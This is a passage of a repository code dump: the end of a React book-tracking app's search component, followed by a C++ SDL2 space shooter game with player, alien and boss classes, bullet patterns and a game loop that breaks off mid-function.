    // Close the details modal.
    hideDetails = () => {
        this.setState(
            {
                detailsModal: {
                    isOpen: false,
                    book: {},
                }
            }
        );
    }

    render() {
        const {
            bookShelves,
            allBooks,
            detailsModal,
        } = this.state;

        return (
            <div className="app">
                <Route
                    path="/"
                    exact
                    render={
                        () => (
                            <ListBooks
                                bookShelves={ bookShelves }
                                onShelfChange={ this.onShelfChange }
                                showDetails={ this.showDetails }
                            />
                        )
                    }
                />
                <Route
                    path="/search"
                    exact
                    render={
                        () => (
                            <SearchBooks
                                allBooks={ allBooks }
                                onShelfChange={ this.onShelfChange }
                                showDetails={ this.showDetails }
                            />
                        )
                    }
                />
                {
                    detailsModal.isOpen
                    && <DetailsModal
                        book={ detailsModal.book }
                        hideDetails={ this.hideDetails }
                    />
                }
            </div>
        )
    }
}

export default BooksApp
<file_sep>/src/components/SearchBooks.js
import React from 'react';
import PropTypes from 'prop-types';
import { Link } from 'react-router-dom';
import { DebounceInput } from 'react-debounce-input';
import BookCard from './BookCard';
import ErrorMessage from './ErrorMessage';
import * as BooksAPI from '../BooksAPI';
class SearchBooks extends React.Component {
state = {
query: '',
results: [],
isError: false,
};
getShelfName = ( book, allBooks ) => {
let shelf = 'none';
const matchingBook = allBooks.find(
currentBook => currentBook.id === book.id
);
if( matchingBook )
shelf = matchingBook.shelf;
return shelf;
};
onShelfChange = newShelfData => {
this.props.onShelfChange( newShelfData );
};
showDetails = book => {
this.props.showDetails( book );
};
onSearch = query => {
this.setState(
{
query,
results: [],
isError: false,
}
);
query.length
&& BooksAPI.search(
query
).then(
result => {
Array.isArray( result )
? this.setState(
{
results: result,
isError: false,
}
)
: this.setState(
{
isError: true,
}
);
}
);
};
render() {
const { allBooks } = this.props;
const {
query,
results,
isError
} = this.state;
return (
<div className="search-books">
<div className="search-books-bar">
<Link
to="/"
className="close-search"
>
Close
</Link>
<div className="search-books-input-wrapper">
<DebounceInput
debounceTimeout={ 200 }
value={ query }
onChange={ event => this.onSearch( event.target.value ) }
type="text"
placeholder="Search by title or author"
/>
</div>
</div>
<div className="search-books-results">
<ol className="books-grid">
{
query
&& results
&& results.map(
book => (
<li
key={ book.id }
>
<BookCard
book={ book }
shelfName={ this.getShelfName( book, allBooks ) }
onShelfChange={ this.onShelfChange }
showDetails={ this.showDetails }
/>
</li>
)
)
}
</ol>
{
isError
&& <ErrorMessage
isError={ isError }
message={ 'No results founded. Please try with a different query' }
/>
}
</div>
</div>
);
};
};
SearchBooks.propTypes = {
onShelfChange: PropTypes.func.isRequired,
showDetails: PropTypes.func.isRequired,
allBooks: PropTypes.array.isRequired,
};
export default SearchBooks; | 2b471cbaa5a11dfe3ab1db14a4578b7cd3ea17a9 | [
"JavaScript"
] | 4 | JavaScript | gianlucabianco/reactnd-project-myreads-starter | d8e10fbcb4af7224fe8e1341446ea55b89d67730 | 54533a57c3afb84e166f17e819203d5652d8fa95 |
refs/heads/master | <repo_name>NegiXNodoka/final<file_sep>/HW_4.cpp
/*This source code copyrighted by <NAME> (2004-2014)
and may not be redistributed without written permission.*/
//Using SDL, SDL_image, standard IO, and strings
#include <SDL2/SDL.h>
#include <stdio.h>
#include <string>
#include <iostream>
#include <array>
#include "SDL2_gfxPrimitives.h"
#include <math.h>
//#include <SDL_image.h>
//Screen dimension constants
const int SCREEN_WIDTH = 600;
const int SCREEN_HEIGHT = 650;
int bossrad = 225;
const double PI = 3.1415926535897932384626433832795;
const int Bullet_RADIUS = 10;
int bulletCount = 0;
int bulletCount2 = 0;
int alienCount = 0;
SDL_Renderer* renderer = nullptr;
// Texture wrapper class: owns an SDL_Texture plus its pixel dimensions and
// provides loading, modulation and rendering helpers.
class LTexture
{
    public:
        // Initializes variables
        LTexture();

        // Deallocates memory
        ~LTexture();

        // Loads image at specified path
        bool loadFromFile( std::string path );

#ifdef _SDL_TTF_H
        // Creates image from font string
        bool loadFromRenderedText( std::string textureText, SDL_Color textColor );
#endif

        // Deallocates texture
        void free();

        // Set color modulation
        void setColor( Uint8 red, Uint8 green, Uint8 blue );

        // Set blending
        void setBlendMode( SDL_BlendMode blending );

        // Set alpha modulation
        void setAlpha( Uint8 alpha );

        // Renders texture at given point
        void render( int x, int y, SDL_Rect* clip = NULL, double angle = 0.0, SDL_Point* center = NULL, SDL_RendererFlip flip = SDL_FLIP_NONE );

        // Gets image dimensions
        int getWidth();
        int getHeight();

    private:
        // The actual hardware texture
        SDL_Texture* mTexture;

        // Image dimensions
        int mWidth;
        int mHeight;
};
//The Bullet that will move around on the screen
class Bullet;
//The FIGHTER that will move around on the screen
class FIGHTER
{
public:
//The dimensions of the FIGHTER
static const int FIGHTER_WIDTH = 50;
static const int FIGHTER_HEIGHT = 50;
//Maximum axis velocity of the FIGHTER
static const int FIGHTER_VEL = 3;
int hp = 10;
//Initializes the variables
FIGHTER();
//Takes key presses and adjusts the FIGHTER's velocity
void handleEvent( SDL_Event& e );
//Moves the FIGHTER and checks collision
void move();
//Shows the FIGHTER on the screen
void render();
int yPos();
int xPos();
int gotHit();
int getHp();
private:
//The X and Y offsets of the FIGHTER
int mPosX, mPosY;
//The velocity of the FIGHTER
int mVelX, mVelY;
//FIGHTER's collision box
SDL_Rect mCollider;
long shootTimer;
long lastHit;
};
// A projectile.  Position is public so collision code can read it directly;
// motion parameters (speed, heading, optional curving) stay private.
class Bullet
{
    public:
        // The X and Y offsets of the bullet.
        int mPosX, mPosY;

        // Initializes the variables.
        // angle is in RADIANS (callers convert with *PI/180); rotate enables a
        // gradually curving heading; east picks which way it curves (see move()).
        Bullet(int x, int y, int speed, float angle, bool rotate, bool east);

        // Moves the Bullet and checks collision
        void move();

        // Shows the bullet on the screen
        void render();

        int xPos();
        int yPos();

    private:
        bool changeDir;   // when true, the heading rotates over time (see move())
        int ms;           // pixels advanced along the heading per update
        float dir;        // current heading in radians
        long changePat;   // last time (SDL_GetTicks) the heading was rotated
        int changed = 0;  // number of 1-degree rotation steps applied (capped at 100)
        bool rot;         // rotation sign: true = dir increases, false = dir decreases
};
// An enemy ship that patrols horizontally and fires bullets.
class ALIEN
{
    public:
        // The dimensions of the ALIEN
        static const int ALIEN_WIDTH = 50;
        static const int ALIEN_HEIGHT = 50;

        // Maximum axis velocity of the ALIEN
        static const int ALIEN_VEL = 2;

        // Initializes the variables; type selects the firing behaviour
        // (1 = three-way spread, 2 = aimed shot - see move()).
        ALIEN(int x, int y, int type);

        // Moves the ALIEN and fires.  xPos/yPos are the fighter's position,
        // used by type-2 aliens to aim.
        void move(int xPos, int yPos);

        // Shows the ALIEN on the screen
        void render();

        int xPos();
        int yPos();

        // Applies one point of damage and returns the remaining hp.
        int gotHit();

    private:
        // The X and Y offsets of the ALIEN
        int mPosX, mPosY;

        // The velocity of the ALIEN
        int mVelX, mVelY;

        // ALIEN's collision box
        SDL_Rect mCollider;

        long shootTimer;  // last shot time (SDL_GetTicks), for fire-rate limiting
        int aType;        // firing behaviour selector (see move())
        int hp = 5;
        bool right;       // current patrol direction (true = moving right)
};
// The stage boss: patrols slowly and cycles through three bullet patterns
// (see BOSS::move()).  Member/constant names were copied from ALIEN.
class BOSS
{
    public:
        // The dimensions of the BOSS.
        // NOTE(review): these constants say 125, but move()/collision code use a
        // hard-coded 225-pixel size (see bossrad and the 225/2 offsets) - confirm
        // which is the real sprite size.
        static const int ALIEN_WIDTH = 125;
        static const int ALIEN_HEIGHT = 125;

        // Maximum axis velocity (effectively stationary; mVelX is set in the ctor).
        static const int ALIEN_VEL = 0;

        // Initializes the variables
        BOSS(int x, int y);

        // Moves the BOSS and fires the current bullet pattern.
        void move();

        // Shows the BOSS on the screen
        void render();

        int xPos();
        int yPos();

        // Applies damage (ignored during the initial 750 ms "menace" period)
        // and returns the remaining hp.
        int gotHit();
        int getHp();

    private:
        // The X and Y offsets of the BOSS
        int mPosX, mPosY;

        // The velocity of the BOSS
        int mVelX, mVelY;

        // BOSS's collision box
        SDL_Rect mCollider;

        long shootTimer;      // last shot time, fires every 750 ms
        bool right = false;   // current patrol direction
        int hp = 40;
        long changeTimer;     // last pattern switch; patterns cycle every 7.5 s
        int pattern;          // 0, 1 or 2 - see move()
        long menaceTime;      // spawn time; boss is idle/invulnerable for 750 ms
};
//Starts up SDL and creates window
bool init();
//Loads media
bool loadMedia();
//Frees media and shuts down SDL
void close();
//Box collision detector
//void checkCollision( Bullet Bul[] );
//The window we'll be rendering to
SDL_Window* gWindow = NULL;
//The window renderer
SDL_Renderer* gRenderer = NULL;
//Scene textures
LTexture gFIGHTERTexture;
LTexture gALIENTexture;
LTexture gBOSSTexture;
// Construct an empty texture wrapper: no hardware texture, zero dimensions.
LTexture::LTexture()
    : mTexture(NULL),
      mWidth(0),
      mHeight(0)
{
}

// Release the underlying SDL texture, if any.
LTexture::~LTexture()
{
    free();
}
// Load an image from disk into this texture.
// Only .bmp files are supported (SDL_LoadBMP; the SDL_image IMG_Load call is
// commented out).  Cyan pixels (0, 0xFF, 0xFF) become transparent via color key.
// Returns true on success; on failure logs the SDL error and returns false.
bool LTexture::loadFromFile( std::string path )
{
    // Get rid of preexisting texture
    free();

    // The final texture
    SDL_Texture* newTexture = NULL;

    // Load image at specified path
    SDL_Surface* loadedSurface = SDL_LoadBMP( path.c_str() );
    //SDL_Surface* loadedSurface = IMG_Load( path.c_str() );
    if( loadedSurface == NULL )
    {
        printf( "Unable to load image %s! SDL Error: %s\n", path.c_str(), SDL_GetError() );
    }
    else
    {
        // Color key image
        SDL_SetColorKey( loadedSurface, SDL_TRUE, SDL_MapRGB( loadedSurface->format, 0, 0xFF, 0xFF ) );

        // Create texture from surface pixels
        newTexture = SDL_CreateTextureFromSurface( gRenderer, loadedSurface );
        if( newTexture == NULL )
        {
            printf( "Unable to create texture from %s! SDL Error: %s\n", path.c_str(), SDL_GetError() );
        }
        else
        {
            // Get image dimensions
            mWidth = loadedSurface->w;
            mHeight = loadedSurface->h;
        }

        // Get rid of old loaded surface
        SDL_FreeSurface( loadedSurface );
    }

    // Return success
    mTexture = newTexture;
    return mTexture != NULL;
}
#ifdef _SDL_TTF_H
// Render a text string into this texture using the global font (gFont).
// Only compiled when SDL_ttf is included.  Returns true on success.
bool LTexture::loadFromRenderedText( std::string textureText, SDL_Color textColor )
{
    // Get rid of preexisting texture
    free();

    // Render text surface
    SDL_Surface* textSurface = TTF_RenderText_Solid( gFont, textureText.c_str(), textColor );
    if( textSurface != NULL )
    {
        // Create texture from surface pixels
        mTexture = SDL_CreateTextureFromSurface( gRenderer, textSurface );
        if( mTexture == NULL )
        {
            printf( "Unable to create texture from rendered text! SDL Error: %s\n", SDL_GetError() );
        }
        else
        {
            // Get image dimensions
            mWidth = textSurface->w;
            mHeight = textSurface->h;
        }

        // Get rid of old surface
        SDL_FreeSurface( textSurface );
    }
    else
    {
        printf( "Unable to render text surface! SDL_ttf Error: %s\n", TTF_GetError() );
    }

    // Return success
    return mTexture != NULL;
}
#endif
// Destroy the wrapped SDL texture (no-op when none is loaded) and reset dimensions.
void LTexture::free()
{
    // Free texture if it exists
    if( mTexture != NULL )
    {
        SDL_DestroyTexture( mTexture );
        mTexture = NULL;
        mWidth = 0;
        mHeight = 0;
    }
}

// Tint all subsequent renders of this texture with the given RGB modulation.
void LTexture::setColor( Uint8 red, Uint8 green, Uint8 blue )
{
    // Modulate texture rgb
    SDL_SetTextureColorMod( mTexture, red, green, blue );
}

// Select the blend mode used when this texture is rendered.
void LTexture::setBlendMode( SDL_BlendMode blending )
{
    // Set blending function
    SDL_SetTextureBlendMode( mTexture, blending );
}

// Set the texture-wide alpha used when this texture is rendered.
void LTexture::setAlpha( Uint8 alpha )
{
    // Modulate texture alpha
    SDL_SetTextureAlphaMod( mTexture, alpha );
}
// Draw the texture at (x, y).  clip selects a sub-rectangle of the source
// (NULL = whole texture); angle/center/flip are forwarded to SDL_RenderCopyEx.
void LTexture::render( int x, int y, SDL_Rect* clip, double angle, SDL_Point* center, SDL_RendererFlip flip )
{
    // Set rendering space and render to screen
    SDL_Rect renderQuad = { x, y, mWidth, mHeight };

    // Set clip rendering dimensions
    if( clip != NULL )
    {
        renderQuad.w = clip->w;
        renderQuad.h = clip->h;
    }

    // Render to screen
    SDL_RenderCopyEx( gRenderer, mTexture, clip, &renderQuad, angle, center, flip );
}

// Width of the loaded image in pixels (0 when nothing is loaded).
int LTexture::getWidth()
{
    return mWidth;
}

// Height of the loaded image in pixels (0 when nothing is loaded).
int LTexture::getHeight()
{
    return mHeight;
}
// Spawn the fighter horizontally centred, three-quarters of the way down the
// screen, at rest.  NOTE(review): the collider size is read from the global
// texture, so loadMedia() must have run before construction - confirm ordering.
FIGHTER::FIGHTER()
{
    // Initialize the offsets
    mPosX = SCREEN_WIDTH/2;
    mPosY = SCREEN_HEIGHT*3/4;

    // Set collision box dimension
    mCollider.w = gFIGHTERTexture.getWidth();
    mCollider.h = gFIGHTERTexture.getHeight();

    // Initialize the velocity
    mVelX = 0;
    mVelY = 0;

    shootTimer = SDL_GetTicks();
    lastHit = SDL_GetTicks();
}

// Spawn an alien at (x, y); type selects the firing behaviour used in move().
ALIEN::ALIEN(int x, int y, int type)
{
    // Initialize the offsets
    mPosX = x;
    mPosY = y;

    // Set collision box dimension
    mCollider.w = gALIENTexture.getWidth();
    mCollider.h = gALIENTexture.getHeight();

    // Initialize the velocity (patrols horizontally at 1 px/update)
    mVelX = 1;
    mVelY = 0;

    shootTimer = SDL_GetTicks();
    aType = type;
    right = false;
}

// Spawn the boss at (x, y).  All of its timers start now, which gives the
// 750 ms "menace" idle period before it moves/fires (see BOSS::move/gotHit).
BOSS::BOSS(int x, int y)
{
    // Initialize the offsets
    mPosX = x;
    mPosY = y;

    // Set collision box dimension
    mCollider.w = gBOSSTexture.getWidth();
    mCollider.h = gBOSSTexture.getHeight();

    // Initialize the velocity
    mVelX = 1;
    mVelY = 0;

    shootTimer = SDL_GetTicks();
    changeTimer = SDL_GetTicks();
    menaceTime = SDL_GetTicks();
    pattern = 0;
}

// Create a bullet at (x, y) moving `speed` px/update along `angle` (radians).
// rotate/east configure the optional curved trajectory (see Bullet::move()).
Bullet::Bullet(int x, int y, int speed, float angle, bool rotate, bool east )
{
    dir = angle;
    mPosX = x;
    mPosY = y;
    changeDir = rotate;
    ms = speed;
    changePat = SDL_GetTicks();
    rot = east;
}

// Player bullets (capacity 50) and enemy bullets (capacity 1000).
// NOTE(review): bulletCount/bulletCount2 index these arrays and are never
// reset or bounded, so long sessions can overflow them - confirm lifetime
// handling at the call sites.
Bullet* abul[50];
Bullet* ebul[1000];
// Advance the alien one frame: patrol horizontally between x = 50 and
// x = SCREEN_WIDTH - 150 (bouncing at the edges), then fire every 1250 ms.
// xPos/yPos are the fighter's top-left corner, used by type-2 aliens to aim.
void ALIEN::move(int xPos, int yPos)
{
    if(right == true)
    {
        mPosX += mVelX;
        if(mPosX > SCREEN_WIDTH-150)
        {
            mPosX -= mVelX;
            right = false;
        }
    }
    else
    {
        mPosX -= mVelX;
        if(mPosX < 50)
        {
            mPosX += mVelX;
            right = true;
        }
    }

    if( shootTimer +1250< SDL_GetTicks() )
    {
        if(aType == 1)
        {
            // Type 1: fixed three-way spread (straight down plus +/-25 degrees).
            ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, 90*PI/180, false, false);
            ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, 65*PI/180, false, false);
            ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, 115*PI/180, false , false);
        }
        else
        if(aType == 2)
        {
            // Type 2: one shot aimed at the fighter's centre.
            //
            // BUG FIX: the original computed
            //   atan( abs(mPosX+25-xPos+25) / abs(mPosY+25-yPos+25) )
            // which (a) adds 50 to each delta due to operator precedence
            // (mPosX+25-xPos+25 == mPosX-xPos+50) and (b) relied on fragile
            // quadrant offsets (+45/+180/+270) that sent bullets AWAY from the
            // fighter in the common "fighter below alien" case.  atan2 gives the
            // correct heading in every quadrant directly; screen Y grows
            // downward, matching Bullet::move's  x += cos, y += sin  convention.
            // (The debug std::cout angle dumps were removed along with it.)
            double muzzleX = mPosX + ALIEN_WIDTH/2;
            double muzzleY = mPosY + ALIEN_HEIGHT;
            double aim = atan2( (yPos + 25) - muzzleY, (xPos + 25) - muzzleX ); // +25 = fighter half-size
            ebul[bulletCount2++] = new Bullet(mPosX+ALIEN_WIDTH/2, mPosY+ALIEN_HEIGHT, 4, aim, false, false);
        }

        shootTimer = SDL_GetTicks();
        // NOTE(review): bulletCount2 is never bounded; ebul[] holds 1000 slots.
    }
}
// Advance the boss one frame.  Completely idle for the first 750 ms after
// spawn ("menace" period); afterwards patrols between x = 50 and
// x = SCREEN_WIDTH - 300 and fires every 750 ms.  The active pattern cycles
// 0 -> 1 -> 2 -> 0 every 7.5 seconds:
//   0: 24-way ring of curving bullets (heading drifts one way)
//   1: the same ring curving the other way
//   2: two short curved arcs plus two straight shots.
void BOSS::move()
{
    if( menaceTime + 750 < SDL_GetTicks())
    {
        if(right == true)
        {
            mPosX += mVelX;
            if(mPosX > SCREEN_WIDTH-300)
            {
                mPosX -= mVelX;
                right = false;
            }
        }
        else
        {
            mPosX -= mVelX;
            if(mPosX < 50)
            {
                mPosX += mVelX;
                right = true;
            }
        }

        if( shootTimer +750< SDL_GetTicks() )
        {
            // Rotate to the next pattern every 7.5 s.
            if(changeTimer +7500 < SDL_GetTicks() )
            {
                changeTimer = SDL_GetTicks();
                pattern++;
                if(pattern == 3)
                {
                    pattern = 0;
                }
            }

            if( pattern == 0 )
            {
                // Full 360-degree ring (24 bullets, 15 degrees apart), curving "east".
                for(int i = 0; i< 24; i++)
                {
                    ebul[bulletCount2++] = new Bullet(mPosX+225/2, mPosY+225/2, 4, (i*15)*PI/180, true, true);
                }
            }
            else
            if(pattern == 1)
            {
                // Same ring, curving the opposite way.
                for(int i = 0; i< 24; i++)
                {
                    ebul[bulletCount2++] = new Bullet(mPosX+225/2, mPosY+225/2, 4, (i*15)*PI/180, true, false);
                }
            }
            else
            {
                // Pattern 2: a right-side arc (0..45 deg) and a left-side arc
                // (180 down to 150 deg), curving toward each other...
                for(int i = 0; i<4; i++)
                {
                    ebul[bulletCount2++] = new Bullet(mPosX+225/2, mPosY+225/2, 4, i*15*PI/180, true, true);
                }
                for(int i = 0; i< 3; i++)
                {
                    ebul[bulletCount2++] = new Bullet(mPosX+225/2, mPosY+225/2, 4, ( 180-(i*15))*PI/180, true, false);
                }
                // ...plus two fast straight shots.
                // NOTE(review): 85 and 75 are NOT converted with *PI/180 like every
                // other call site, so they are interpreted as radians - this looks
                // like a bug (intended 85/75 degrees, roughly straight down). Confirm.
                ebul[bulletCount2++] = new Bullet((mPosX+225/2)+25, mPosY+225/2, 5, 85, false, false);
                ebul[bulletCount2++] = new Bullet((mPosX+225/2)-25, mPosY+225/2, 5, 75, false, false);
            }

            shootTimer = SDL_GetTicks();
        }
    }
}
// Translate keyboard input into fighter movement and shooting.
// Movement uses the press/release delta scheme: KEYDOWN adds FIGHTER_VEL to the
// velocity and KEYUP subtracts it again, so holding a key gives steady motion.
// Space fires a player bullet (speed 5, heading 270 deg = straight up, since
// screen Y grows downward) from the ship's nose, rate-limited to one shot per
// 300 ms; note it triggers on both press and release.
void FIGHTER::handleEvent( SDL_Event& e )
{
    // If a key was pressed
    if( e.type == SDL_KEYDOWN && e.key.repeat == 0 )
    {
        // Adjust the velocity
        switch( e.key.keysym.sym )
        {
            case SDLK_UP: mVelY -= FIGHTER_VEL; break;
            case SDLK_DOWN: mVelY += FIGHTER_VEL; break;
            case SDLK_LEFT: mVelX -= FIGHTER_VEL; break;
            case SDLK_RIGHT: mVelX += FIGHTER_VEL; break;
            case ' ': // ' ' has the same value as SDLK_SPACE
                if( SDL_GetTicks() > shootTimer+300 )
                {
                    // NOTE(review): bulletCount is never wrapped; abul[] has 50 slots.
                    abul[bulletCount++] = new Bullet(mPosX+FIGHTER_WIDTH/2, mPosY, 5, 270*PI/180, false, false);
                    shootTimer = SDL_GetTicks();
                }
        }
    }
    // If a key was released
    else if( e.type == SDL_KEYUP && e.key.repeat == 0 )
    {
        // Adjust the velocity (undo the corresponding KEYDOWN delta)
        switch( e.key.keysym.sym )
        {
            case SDLK_UP: mVelY += FIGHTER_VEL; break;
            case SDLK_DOWN: mVelY -= FIGHTER_VEL; break;
            case SDLK_LEFT: mVelX += FIGHTER_VEL; break;
            case SDLK_RIGHT: mVelX -= FIGHTER_VEL; break;
            case ' ':
                if( SDL_GetTicks() > shootTimer+300 )
                {
                    abul[bulletCount++] = new Bullet(mPosX+FIGHTER_WIDTH/2, mPosY, 5, 270*PI/180, false , false);
                    shootTimer = SDL_GetTicks();
                }
        }
    }
}
// Apply the current velocity to the fighter, keeping it inside the playable
// area (the right margin stops 50 px short of the window edge), and keep the
// collision box in sync.  Equivalent to the original move-then-revert logic:
// an axis step that would leave the field is simply not taken.
void FIGHTER::move()
{
    // Horizontal step: accept it only if the ship stays inside the field.
    const int nextX = mPosX + mVelX;
    if( nextX >= 0 && nextX + FIGHTER_WIDTH <= SCREEN_WIDTH - 50 )
    {
        mPosX = nextX;
    }
    mCollider.x = mPosX;

    // Vertical step, same accept-or-stay rule against the full window height.
    const int nextY = mPosY + mVelY;
    if( nextY >= 0 && nextY + FIGHTER_HEIGHT <= SCREEN_HEIGHT )
    {
        mPosY = nextY;
    }
    mCollider.y = mPosY;
}
// Step the bullet along its heading. "Curving" bullets (changeDir == true)
// additionally rotate their direction by 1 degree every 20 ms, for at most
// 100 adjustments, spiralling clockwise or counter-clockwise per `rot`.
void Bullet::move()
{
    // Cast truncates toward zero, so shallow headings or low speeds can
    // round a component to 0 for a frame.
    mPosX += (int) (ms*cos(dir) );
    mPosY += (int) (ms*sin(dir) );
    if( changeDir == true && changePat+20 < SDL_GetTicks() && changed < 100)
    {
        if( rot == false)
        {
            dir -=(1*PI/180);   // counter-clockwise curve
        }
        else
        {
            dir +=(1*PI/180);   // clockwise curve
        }
        changePat = SDL_GetTicks();
        changed++;
    }
}
// Draw the alien sprite at its current position.
void ALIEN::render()
{
    gALIENTexture.render(mPosX, mPosY);
}
// Draw the boss (space station) sprite at its current position.
void BOSS::render()
{
    gBOSSTexture.render(mPosX, mPosY);
}
// Draw the player sprite at its current position.
void FIGHTER::render()
{
    //Show the FIGHTER
    gFIGHTERTexture.render( mPosX, mPosY );
}
// Current top-left X of the fighter sprite.
int FIGHTER::xPos()
{
    return mPosX;
}
// Current top-left Y of the fighter sprite.
int FIGHTER::yPos()
{
    return mPosY;
}
// Register a hit on the player. Damage is applied at most once per 250 ms
// (lastHit acts as a short invulnerability window), so overlapping a
// bullet for several frames costs a single hit point.
int FIGHTER::gotHit()
{
    if(lastHit + 250 < SDL_GetTicks() )
    {
        hp--;
        lastHit = SDL_GetTicks();
    }
    return hp;   // remaining hit points after the (possible) hit
}
// Remaining hit points; used to size the blue HP bar.
int FIGHTER::getHp()
{
    return hp;
}
// Current top-left X of the alien sprite.
int ALIEN::xPos()
{
    return mPosX;
}
// Current top-left Y of the alien sprite.
int ALIEN::yPos()
{
    return mPosY;
}
// Register a hit: aliens have no invulnerability window, so every call
// costs one hit point. Returns the remaining hp.
int ALIEN::gotHit()
{
    hp--;
    return hp;
}
// Current top-left X of the boss sprite.
int BOSS::xPos()
{
    return mPosX;
}
// Current top-left Y of the boss sprite.
int BOSS::yPos()
{
    return mPosY;
}
// Register a hit on the boss. Damage only counts once the last "menace"
// started more than 750 ms ago.
// NOTE(review): menaceTime is not updated here, so the effective gating
// depends on how the boss's move() maintains menaceTime — verify.
int BOSS::gotHit()
{
    if( menaceTime + 750 < SDL_GetTicks())
    {
        hp--;
    }
    return hp;
}
// Remaining hit points; used to size the red HP bar.
int BOSS::getHp()
{
    return hp;
}
// Draw the bullet as a filled red circle at its current position.
void Bullet::render()
{
    filledCircleRGBA(gRenderer, mPosX, mPosY, Bullet_RADIUS, 0xFF,0x0,0x0,0xFF);
}
// Current center X of the bullet.
int Bullet::xPos()
{
    return mPosX;
}
// Current center Y of the bullet.
int Bullet::yPos()
{
    return mPosY;
}
// Initialize SDL video, create the game window and a vsynced renderer.
// Returns false (after logging) if any stage fails; partial setup is left
// for close() to release.
bool init()
{
    //Initialization flag
    bool success = true;
    //Initialize SDL
    if( SDL_Init( SDL_INIT_VIDEO ) < 0 )
    {
        printf( "SDL could not initialize! SDL Error: %s\n", SDL_GetError() );
        success = false;
    }
    else
    {
        //Set texture filtering to linear
        if( !SDL_SetHint( SDL_HINT_RENDER_SCALE_QUALITY, "1" ) )
        {
            printf( "Warning: Linear texture filtering not enabled!" );
        }
        //Create window
        gWindow = SDL_CreateWindow( "Last Boss", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED, SCREEN_WIDTH, SCREEN_HEIGHT, SDL_WINDOW_SHOWN );
        if( gWindow == NULL )
        {
            printf( "Window could not be created! SDL Error: %s\n", SDL_GetError() );
            success = false;
        }
        else
        {
            //Create vsynced renderer for window
            gRenderer = SDL_CreateRenderer( gWindow, -1, SDL_RENDERER_ACCELERATED | SDL_RENDERER_PRESENTVSYNC );
            if( gRenderer == NULL )
            {
                printf( "Renderer could not be created! SDL Error: %s\n", SDL_GetError() );
                success = false;
            }
            else
            {
                //Initialize renderer color
                SDL_SetRenderDrawColor( gRenderer, 0xFF, 0xFF, 0xFF, 0xFF );
            }
        }
    }
    return success;
}
// Load every sprite the game needs. Returns false if any asset is missing
// so main() can abort before entering the game loop; all three loads are
// attempted so every missing file gets reported.
bool loadMedia()
{
    //Loading success flag
    bool success = true;
    //Load player texture
    if( !gFIGHTERTexture.loadFromFile( "src/MiG-51S.bmp" ) )
    {
        printf( "Failed to load FIGHTER texture!\n" );
        success = false;
    }
    if( !gALIENTexture.loadFromFile( "src/alien1.bmp" ) )
    {
        // Bug fix: this message (and the one below) were copy-pasted and
        // blamed the FIGHTER texture for every failure.
        printf( "Failed to load ALIEN texture!\n" );
        success = false;
    }
    if( !gBOSSTexture.loadFromFile( "src/spacestation.bmp" ) )
    {
        printf( "Failed to load BOSS texture!\n" );
        success = false;
    }
    return success;
}
// Release all SDL resources: textures, renderer, window, then shut down
// the SDL subsystems. Safe to call after a partial init().
void close()
{
    //Free loaded images
    gFIGHTERTexture.free();
    gALIENTexture.free();
    gBOSSTexture.free();
    //Destroy window
    SDL_DestroyRenderer( gRenderer );
    SDL_DestroyWindow( gWindow );
    gWindow = NULL;
    gRenderer = NULL;
    //Quit SDL subsystems
    SDL_Quit();
}
// Game entry point: initialize SDL, load assets, then run the main loop.
// A wave of five aliens spawns first; destroying the last one spawns the
// boss. The game ends when either the boss or the player reaches 0 hp,
// or when the window is closed.
int main( int argc, char* args[] )
{
    //Start up SDL and create window
    if( !init() )
    {
        printf( "Failed to initialize!\n" );
    }
    else
    {
        //Load media
        if( !loadMedia() )
        {
            printf( "Failed to load media!\n" );
        }
        else
        {
            //Main loop flag
            bool quit = false;
            //Event handler
            SDL_Event e;
            //The FIGHTER that will be moving around on the screen
            FIGHTER fight;
            // Opening wave: five aliens laid out on a diagonal.
            ALIEN* aliens[100];
            for(int i = 0; i< 5; i++)
            {
                aliens[alienCount++] = new ALIEN( SCREEN_WIDTH-150-(100*i), 70*i, 1);
            }
            int hpLeft = 10;
            bool boss = false;
            BOSS* station;
            //While application is running
            while( !quit )
            {
                //Handle events on queue
                while( SDL_PollEvent( &e ) != 0 )
                {
                    //User requests quit
                    if( e.type == SDL_QUIT )
                    {
                        quit = true;
                    }
                    //Handle input for the FIGHTER
                    fight.handleEvent( e );
                }
                //Move the FIGHTER and check collision
                fight.move();
                for(int i = 0; i<alienCount; i++)
                {
                    aliens[i]->move(fight.xPos(), fight.yPos());
                }
                if( boss )
                {
                    station->move();
                }
                // Player bullets: cull off-screen shots, then hit-test
                // against aliens (or the boss once it has spawned).
                for(int i = 0; i<bulletCount; i++)
                {
                    abul[i]->move();
                    if(abul[i]->xPos()+Bullet_RADIUS < 0 || abul[i]->xPos() > SCREEN_WIDTH-50 ||
                       abul[i]->yPos()+Bullet_RADIUS < 0 || abul[i]->yPos() > SCREEN_HEIGHT
                    )
                    {
                        // Remove bullet i by shifting the tail left, then
                        // re-examine the same index on the next pass.
                        for(int p = i; p<bulletCount-1; p++)
                        {
                            abul[p] = abul[p+1];
                        }
                        i--;
                        bulletCount--;
                    }
                    else
                    if( boss == false)
                    {
                        for(int k = 0; k<alienCount; k++)
                        {
                            // Circle collision: centers closer than 30 px.
                            if( sqrt( pow( (double) ( (aliens[k]->xPos()+25)-abul[i]->xPos() ), 2.0 ) + pow( (double) ( (aliens[k]->yPos()+25)-abul[i]->yPos() ), 2.0 ) ) < 30)
                            {
                                for(int p = i; p<bulletCount-1; p++)
                                {
                                    abul[p] = abul[p+1];
                                }
                                i--;
                                bulletCount--;
                                hpLeft = aliens[k]->gotHit();
                                if(hpLeft == 0)
                                {
                                    if(alienCount==1)
                                    {
                                        // Last alien destroyed: spawn the boss
                                        // centered over the playfield.
                                        alienCount--;
                                        boss = true;
                                        station = new BOSS( ( ( (SCREEN_WIDTH-50)/2 )-(225/2)), SCREEN_HEIGHT/15 );
                                        break;
                                    }
                                    else
                                    {
                                        for(int o = k; o<alienCount-1;o++)
                                        {
                                            aliens[o] = aliens[o+1];
                                        }
                                        alienCount--;
                                    }
                                }
                                break;
                            }
                        }
                    }
                    else
                    {
                        // Boss hit-test uses a larger 60 px radius around
                        // the station's 100,100 offset center.
